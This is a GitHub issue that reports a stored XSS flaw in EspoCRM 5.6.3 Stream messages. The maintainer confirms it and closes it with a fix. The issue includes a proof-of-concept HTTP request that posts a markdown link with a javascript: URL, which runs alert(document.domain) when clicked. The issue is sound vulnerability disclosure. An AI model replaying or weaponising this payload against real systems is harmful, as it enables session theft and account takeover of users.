Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Stored XSS in Stream messages #1349

Closed
KhajiitStoleNothing opened this issue Jul 12, 2019 · 2 comments

Comments

@KhajiitStoleNothing
Copy link

commented Jul 12, 2019

Description

Current version of EspoCRM 5.6.3 is vulnerable to stored XSS due to lack of filtration of user-supplied data in Stream messages. Malicious attacker can create specially crafted link, which contains javascript code and assign it to any user in the system. After the link is clicked malicious javascript code will be executed in user browser.

PoC

Make the following request (insert your authentication data and hostname)

POST /api/v1/Note HTTP/1.1
Host: <PASTE YOUR HOSTNAME HERE>
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Authorization: Basic <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization: <PASTE YOUR AUTH TOKEN HERE>
Espo-Authorization-By-Token: true
X-Requested-With: XMLHttpRequest
Content-Length: 108
Cookie: <PASTE YOUR COOKIE HERE>

{"type":"Post","targetType":"self","post":"[test](javascript:alert(document.domain%29)","attachmentsIds":[]}

Then open the notifications and click the link.
image

@yurikuzn

This comment has been minimized.

Copy link
Contributor

commented Jul 15, 2019

Thanks for reporting. FIx: 97bdd22

@yurikuzn yurikuzn closed this Jul 15, 2019

@yurikuzn yurikuzn added this to the Version 5.6.4 milestone Jul 15, 2019

@yurikuzn yurikuzn self-assigned this Jul 15, 2019

@yurikuzn yurikuzn added the bug label Jul 15, 2019

@yurikuzn yurikuzn changed the title Stored XSS in Stream messages EspoCRM 5.6.3 Stored XSS in Stream messages Jul 15, 2019

@fgeek

This comment has been minimized.

Copy link

commented Aug 7, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.